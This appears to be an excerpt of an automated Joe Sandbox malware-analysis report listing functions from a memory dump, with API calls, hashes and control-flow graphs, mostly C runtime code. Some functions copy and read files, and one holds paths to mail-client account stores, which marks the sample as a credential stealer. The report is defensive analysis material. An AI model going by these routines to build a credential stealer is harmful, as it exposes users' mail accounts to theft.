                  • API String ID: 3296212668-3023110444
                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                  • Instruction ID: 6fcbc69bbc4904bcb72d543c216f25a346dc9e34e815e19785b25df3e8f09eb2
                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                  • Instruction Fuzzy Hash: 9E61E671D04218EBEF128BA4C840BDEBBF9EF25208F10456AD204AF298DB745EC5CF56
                  Function 240C19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _strlen
                  • String ID: %m$~$Gon~$~F@7$~dra
                  • API String ID: 4218353326-230879103
                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                  • Instruction ID: 6b78d65264031e5aa422024bafef65dbd00e612b7101072c85a004d89f9aa68f
                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                  • Instruction Fuzzy Hash: 34710971D002289BDF129BB4D894AEF7BFCAF19604F1440AAE544DB245EA74DBC5CFA0
                  Function 240C7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 276 240c7cc2-240c7cd6 277 240c7cd8-240c7cdd 276->277 278 240c7d44-240c7d4c 276->278 277->278 281 240c7cdf-240c7ce4 277->281 279 240c7d4e-240c7d51 278->279 280 240c7d93-240c7dab call 240c7e35 278->280 279->280 282 240c7d53-240c7d90 call 240c571e * 4 279->282 288 240c7dae-240c7db5 280->288 281->278 284 240c7ce6-240c7ce9 281->284 282->280 284->278 287 240c7ceb-240c7cf3 284->287 289 240c7d0d-240c7d15 287->289 290 240c7cf5-240c7cf8 287->290 292 240c7dd4-240c7dd8 288->292 293 240c7db7-240c7dbb 288->293 295 240c7d2f-240c7d43 call 240c571e * 2 289->295 296 240c7d17-240c7d1a 289->296 290->289 294 240c7cfa-240c7d0c call 240c571e call 240c90ba 290->294 303 240c7dda-240c7ddf 292->303 304 240c7df0-240c7dfc 292->304 298 240c7dbd-240c7dc0 293->298 299 240c7dd1 293->299 294->289 295->278 296->295 301 240c7d1c-240c7d2e call 240c571e call 240c91b8 296->301 298->299 307 240c7dc2-240c7dd0 call 240c571e * 2 298->307 299->292 301->295 311 240c7ded 303->311 312 240c7de1-240c7de4 303->312 304->288 306 240c7dfe-240c7e0b call 240c571e 304->306 307->299 311->304 312->311 320 240c7de6-240c7dec call 240c571e 312->320 320->311
                  APIs
                  • ___free_lconv_mon.LIBCMT ref: 240C7D06
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C90D7
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C90E9
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C90FB
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C910D
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C911F
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9131
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9143
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9155
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9167
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C9179
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C918B
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C919D
                    • Part of subcall function 240C90BA: _free.LIBCMT ref: 240C91AF
                  • _free.LIBCMT ref: 240C7CFB
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C7D1D
                  • _free.LIBCMT ref: 240C7D32
                  • _free.LIBCMT ref: 240C7D3D
                  • _free.LIBCMT ref: 240C7D5F
                  • _free.LIBCMT ref: 240C7D72
                  • _free.LIBCMT ref: 240C7D80
                  • _free.LIBCMT ref: 240C7D8B
                  • _free.LIBCMT ref: 240C7DC3
                  • _free.LIBCMT ref: 240C7DCA
                  • _free.LIBCMT ref: 240C7DE7
                  • _free.LIBCMT ref: 240C7DFF
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                  • String ID:
                  • API String ID: 161543041-0
                  • Opcode ID: e8fc94c68f399ebce0de0458f152ed227e403c5c8fb819f2123eb56fca242cee
                  • Instruction ID: 46472171d6200dc484a32e7652a2eb74da53d6cffcb5b579cd7447a55e4040ff
                  • Opcode Fuzzy Hash: e8fc94c68f399ebce0de0458f152ed227e403c5c8fb819f2123eb56fca242cee
                  • Instruction Fuzzy Hash: FD314B31600A06DFEB219A38E940F6FBBFAEF00254F10456AE959D7155DE31B9C0CB24
                  Function 240C59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • _free.LIBCMT ref: 240C59EA
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C59F6
                  • _free.LIBCMT ref: 240C5A01
                  • _free.LIBCMT ref: 240C5A0C
                  • _free.LIBCMT ref: 240C5A17
                  • _free.LIBCMT ref: 240C5A22
                  • _free.LIBCMT ref: 240C5A2D
                  • _free.LIBCMT ref: 240C5A38
                  • _free.LIBCMT ref: 240C5A43
                  • _free.LIBCMT ref: 240C5A51
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: f8cf29e5eb40fa3938336037387164c7ee7708a699e3fdb4039cffd8942810c0
                  • Instruction ID: 4cebbcf40288f1f865f0d60e2b1bdfc5dfab19890faa234b1e2cdc50cd346399
                  • Opcode Fuzzy Hash: f8cf29e5eb40fa3938336037387164c7ee7708a699e3fdb4039cffd8942810c0
                  • Instruction Fuzzy Hash: BB11A47E560558EFDB11DF94D841CDE3FA5EF14254B0542A1BE088B229DA31DAD09B84
                  Function 240C1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D1B
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 240C1D37
                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D4B
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D58
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D72
                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D7D
                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C1D8A
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                  • String ID:
                  • API String ID: 1454806937-0
                  • Opcode ID: 09b8761fd06370feb212a11fa6aab1d2912aca27df71cdd43af5ca9dab20fb7c
                  • Instruction ID: 19bb9dc82f409a3fdf3a17e7789753d729f50bce1f8ba781141468d3189d1c35
                  • Opcode Fuzzy Hash: 09b8761fd06370feb212a11fa6aab1d2912aca27df71cdd43af5ca9dab20fb7c
                  • Instruction Fuzzy Hash: 8F2116B194121CEFEB119FA4DC8CFEEB6ACEF18354F1009A5F611E6140DA749EC68A70
                  Function 240C9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 377 240c9492-240c94ef GetConsoleCP 378 240c94f5-240c9511 377->378 379 240c9632-240c9644 call 240c2ada 377->379 381 240c952c-240c953d call 240c7c19 378->381 382 240c9513-240c952a 378->382 389 240c953f-240c9542 381->389 390 240c9563-240c9565 381->390 384 240c9566-240c9575 call 240c79e6 382->384 384->379 391 240c957b-240c959b WideCharToMultiByte 384->391 392 240c9548-240c955a call 240c79e6 389->392 393 240c9609-240c9628 389->393 390->384 391->379 394 240c95a1-240c95b7 WriteFile 391->394 392->379 399 240c9560-240c9561 392->399 393->379 396 240c95b9-240c95ca 394->396 397 240c962a-240c9630 GetLastError 394->397 396->379 400 240c95cc-240c95d0 396->400 397->379 399->391 401 240c95fe-240c9601 400->401 402 240c95d2-240c95f0 WriteFile 400->402 401->378 404 240c9607 401->404 402->397 403 240c95f2-240c95f6 402->403 403->379 405 240c95f8-240c95fb 403->405 404->379 405->401
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,240C9C07,?,00000000,?,00000000,00000000), ref: 240C94D4
                  • __fassign.LIBCMT ref: 240C954F
                  • __fassign.LIBCMT ref: 240C956A
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 240C9590
                  • WriteFile.KERNEL32(?,?,00000000,240C9C07,00000000,?,?,?,?,?,?,?,?,?,240C9C07,?), ref: 240C95AF
                  • WriteFile.KERNEL32(?,?,00000001,240C9C07,00000000,?,?,?,?,?,?,?,?,?,240C9C07,?), ref: 240C95E8
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: dd7bc24edc1fd009ea9801563bda2a6c5959716219e30bea1eb730c0d5786d19
                  • Instruction ID: e92a177f9e86b21ac4353c9c60248c6078e4e19a516995ba06fa8f0dd513c73a
                  • Opcode Fuzzy Hash: dd7bc24edc1fd009ea9801563bda2a6c5959716219e30bea1eb730c0d5786d19
                  • Instruction Fuzzy Hash: DA518071E00249EFDB00CFA8D895BEEBBF8FF09310F14456AE955E7291D670A981CB61
                  Function 240C3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 240c3370-240c33b5 call 240c3330 call 240c37a7 411 240c3416-240c3419 406->411 412 240c33b7-240c33c9 406->412 413 240c3439-240c3442 411->413 414 240c341b-240c3428 call 240c3790 411->414 412->413 415 240c33cb 412->415 418 240c342d-240c3436 call 240c3330 414->418 417 240c33d0-240c33e7 415->417 419 240c33fd 417->419 420 240c33e9-240c33f7 call 240c3740 417->420 418->413 422 240c3400-240c3405 419->422 427 240c340d-240c3414 420->427 428 240c33f9 420->428 422->417 425 240c3407-240c3409 422->425 425->413 429 240c340b 425->429 427->418 430 240c33fb 428->430 431 240c3443-240c344c 428->431 429->418 430->422 432 240c344e-240c3455 431->432 433 240c3486-240c3496 call 240c3774 431->433 432->433 434 240c3457-240c3466 call 240cbbe0 432->434 439 240c3498-240c34a7 call 240c3790 433->439 440 240c34aa-240c34c6 call 240c3330 call 240c3758 433->440 442 240c3468-240c3480 434->442 443 240c3483 434->443 439->440 442->443 443->433
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 240C339B
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 240C33A3
                  • _ValidateLocalCookies.LIBCMT ref: 240C3431
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 240C345C
                  • _ValidateLocalCookies.LIBCMT ref: 240C34B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                  • String ID: csm
                  • API String ID: 1170836740-1018135373
                  • Opcode ID: 9745e5d0f31d84e7c89233e46ebc96e89668bb4b3ed23831f9b7747260ef4d3e
                  • Instruction ID: 06abe64f23273347c3538c3ef529827c0788ba86d6c4bd00e72b0fa01d051467
                  • Opcode Fuzzy Hash: 9745e5d0f31d84e7c89233e46ebc96e89668bb4b3ed23831f9b7747260ef4d3e
                  • Instruction Fuzzy Hash: 0641D634A20208DBCB01CFA8C884A9EBFF5EF45328F108165E914AB255D7B5EA85CF95
                  Function 240C925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 240C9221: _free.LIBCMT ref: 240C924A
                  • _free.LIBCMT ref: 240C92AB
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C92B6
                  • _free.LIBCMT ref: 240C92C1
                  • _free.LIBCMT ref: 240C9315
                  • _free.LIBCMT ref: 240C9320
                  • _free.LIBCMT ref: 240C932B
                  • _free.LIBCMT ref: 240C9336
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                  • Instruction ID: bf0f07f453aeb30539cf670b03736461907acd4ea241b66e9aa11d4faee5fba8
                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                  • Instruction Fuzzy Hash: 12118E31980F08FAEA20ABB0EC45FCF7B9DAF14718F400824A6DDB6096DA24B6C48751
                  Function 240C5351 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 488 240c5351-240c535e 489 240c537b-240c53c7 call 240c571e * 4 488->489 490 240c5360-240c536c 488->490 490->489 491 240c536e-240c5375 call 240c571e 490->491 491->489
                  APIs
                  • _free.LIBCMT ref: 240C536F
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C5381
                  • _free.LIBCMT ref: 240C5394
                  • _free.LIBCMT ref: 240C53A5
                  • _free.LIBCMT ref: 240C53B6
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID: `=&$
                  • API String ID: 776569668-3373021481
                  • Opcode ID: 787e2694d74bb422726b4264d02f998634d13706187bdc2d39fd906016d3e9a0
                  • Instruction ID: 113adc791366717c535b45ee2423326f028ce665581bf58dfddbc65131c6d7aa
                  • Opcode Fuzzy Hash: 787e2694d74bb422726b4264d02f998634d13706187bdc2d39fd906016d3e9a0
                  • Instruction Fuzzy Hash: 70F0FEF9855634EB97095F24E98080D3FB1FB29664341032AFC14B7258DBB945CA9BC4
                  Function 240C8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,240C6FFD,00000000,?,?,?,240C8A72,?,?,00000100), ref: 240C887B
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,240C8A72,?,?,00000100,5EFC4D8B,?,?), ref: 240C8901
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 240C89FB
                  • __freea.LIBCMT ref: 240C8A08
                    • Part of subcall function 240C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 240C5702
                  • __freea.LIBCMT ref: 240C8A11
                  • __freea.LIBCMT ref: 240C8A36
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 5b30705d112785bf875e4a062681d05a50c4c85d5f2c4e58bf725f56d88e82a9
                  • Instruction ID: 5042e4992fde6ba87728e42fa84f1d740f80a19bc73d1b0a72552a4252eadf19
                  • Opcode Fuzzy Hash: 5b30705d112785bf875e4a062681d05a50c4c85d5f2c4e58bf725f56d88e82a9
                  • Instruction Fuzzy Hash: F5510073610216EBFB158E64CC80EAF3BA9EF40695F100679FD05E6140EB38DCD496AD
                  Function 240C15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                  Download Yara Rule
                  APIs
                  • _strlen.LIBCMT ref: 240C1607
                  • _strcat.LIBCMT ref: 240C161D
                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,240C190E,?,?,00000000,?,00000000), ref: 240C1643
                  • lstrcatW.KERNEL32(?,?), ref: 240C165A
                  • lstrlenW.KERNEL32(?,?,?,?,?,240C190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 240C1661
                  • lstrcatW.KERNEL32(00001008,?), ref: 240C1686
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrcatlstrlen$_strcat_strlen
                  • String ID:
                  • API String ID: 1922816806-0
                  • Opcode ID: 4fbc9d14b9ffdc5988ff28af70a3f90b019174a74757ec4609f52614eb9029a3
                  • Instruction ID: e1db0f81d6c84f8c7d3f4bdcd61e02bd964e1333f862d40d7f40d5fa8058f4f9
                  • Opcode Fuzzy Hash: 4fbc9d14b9ffdc5988ff28af70a3f90b019174a74757ec4609f52614eb9029a3
                  • Instruction Fuzzy Hash: 44219836900204EBD7059F64EC84FEE77B8EF98714F24402AE504AF185DB34A9858BA5
                  Function 240C1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcatW.KERNEL32(?,?), ref: 240C1038
                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 240C104B
                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 240C1061
                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 240C1075
                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 240C1090
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 240C10B8
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$AttributesFilelstrcat
                  • String ID:
                  • API String ID: 3594823470-0
                  • Opcode ID: 7d5cfb474a489363faa0df0f1ccb3a9b094bd00b5e1082b3dce314f9f157b6ac
                  • Instruction ID: 0f2df21eb2c067b81f5c93c8e1db330d05e3148188111fbf1dcae1ab7a66f8f2
                  • Opcode Fuzzy Hash: 7d5cfb474a489363faa0df0f1ccb3a9b094bd00b5e1082b3dce314f9f157b6ac
                  • Instruction Fuzzy Hash: 03217F35900328EBDF11DE64DC48EDF3768EF94218F2046A6E9599B1A1DE709EC5CF50
                  Function 240C3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,240C3518,240C23F1,240C1F17), ref: 240C3864
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 240C3872
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 240C388B
                  • SetLastError.KERNEL32(00000000,?,240C3518,240C23F1,240C1F17), ref: 240C38DD
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: 9a7ac94563540d006a2ba0876924083cada6365ebb8fc84e83057bfd7434bc7a
                  • Instruction ID: fd1776cb81b3fa322f7c0d2e324a43daf9e8070bebec27fe92f37849d88fd9fc
                  • Opcode Fuzzy Hash: 9a7ac94563540d006a2ba0876924083cada6365ebb8fc84e83057bfd7434bc7a
                  • Instruction Fuzzy Hash: F501F132628B12DEF3012A79EC89B4F2AA4EB156787204239FA10A40D1EEF548C8920C
                  Function 240C5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,240C6C6C), ref: 240C5AFA
                  • _free.LIBCMT ref: 240C5B2D
                  • _free.LIBCMT ref: 240C5B55
                  • SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B62
                  • SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B6E
                  • _abort.LIBCMT ref: 240C5B74
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 9ba6d013a5534c3db62c61c75844cae49662f50104979750401d3f8a150c7230
                  • Instruction ID: 62e9368555729ef156eb402333d633f3b719b13c2dc681155fcfdcaad1c2c10c
                  • Opcode Fuzzy Hash: 9ba6d013a5534c3db62c61c75844cae49662f50104979750401d3f8a150c7230
                  • Instruction Fuzzy Hash: 8FF0C83E544930EBE3062634FC05F1F2EA9DFE1975B250134F918A6185FE3485C24165
                  Function 240C11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 240C1E89: lstrlenW.KERNEL32(?,?,?,?,?,240C10DF,?,?,?,00000000), ref: 240C1E9A
                    • Part of subcall function 240C1E89: lstrcatW.KERNEL32(?,?), ref: 240C1EAC
                    • Part of subcall function 240C1E89: lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EB3
                    • Part of subcall function 240C1E89: lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EC8
                    • Part of subcall function 240C1E89: lstrcatW.KERNEL32(?,240C10DF), ref: 240C1ED3
                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 240C122A
                    • Part of subcall function 240C173A: _strlen.LIBCMT ref: 240C1855
                    • Part of subcall function 240C173A: _strlen.LIBCMT ref: 240C1869
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                  • API String ID: 4036392271-1520055953
                  • Opcode ID: c55290bd3b9da955f535719d9d3d86aa1e8acd58a0247a065967d76fd90e214f
                  • Instruction ID: 4f19db6d0d1d482eba45099f2943c5f1491f990133d0439a840d9e01b720b3a3
                  • Opcode Fuzzy Hash: c55290bd3b9da955f535719d9d3d86aa1e8acd58a0247a065967d76fd90e214f
                  • Instruction Fuzzy Hash: AE21B179E10208AAEB1197A4EC91FED7339EF94718F100556F604EF1D4EAB11EC58B58
                  Function 240C4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
